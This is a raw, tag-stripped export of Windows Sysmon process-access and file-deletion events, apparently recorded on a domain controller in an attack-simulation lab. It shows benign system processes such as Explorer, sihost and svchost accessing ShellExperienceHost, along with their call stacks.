14:58:33.560{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC19-607E-6B0E-00000000BB01}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC19-607E-6B0E-00000000BB01}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fc6e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3fbe5|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3f049|C:\Windows\System32\modernexecserver.dll+3fd2f|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f6a2|C:\Windows\System32\modernexecserver.dll+3fd1e|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fd0b|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3fdee|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4242312C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f400|C:\Windows\System32\modernexecserver.dll+47a8c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000080113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-8105-00000000BB01}836ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\ActionCenterCache\microsoft-explorer-notification--d1f6275c-b9a0-a25e-7f73-51b54487be4c-_6_0.pngMD5=00E5FCFD833151F7CBDE607E2F7AFEB4,SHA256=B80192AAABE007BAECD0603E3CE183E9D554B8A6B0411D20716ACFA086AE3035,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4242312C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+478ab|C:\Windows\System32\modernexecserver.dll+476e0|C:\Windows\System32\modernexecserver.dll+4763b|C:\Windows\System32\modernexecserver.dll+3985d|C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll+1781|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 10341000x800000000000000080111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fc6e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3fbe5|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3f049|C:\Windows\System32\modernexecserver.dll+3fd2f|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f6a2|C:\Windows\System32\modernexecserver.dll+3fd1e|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 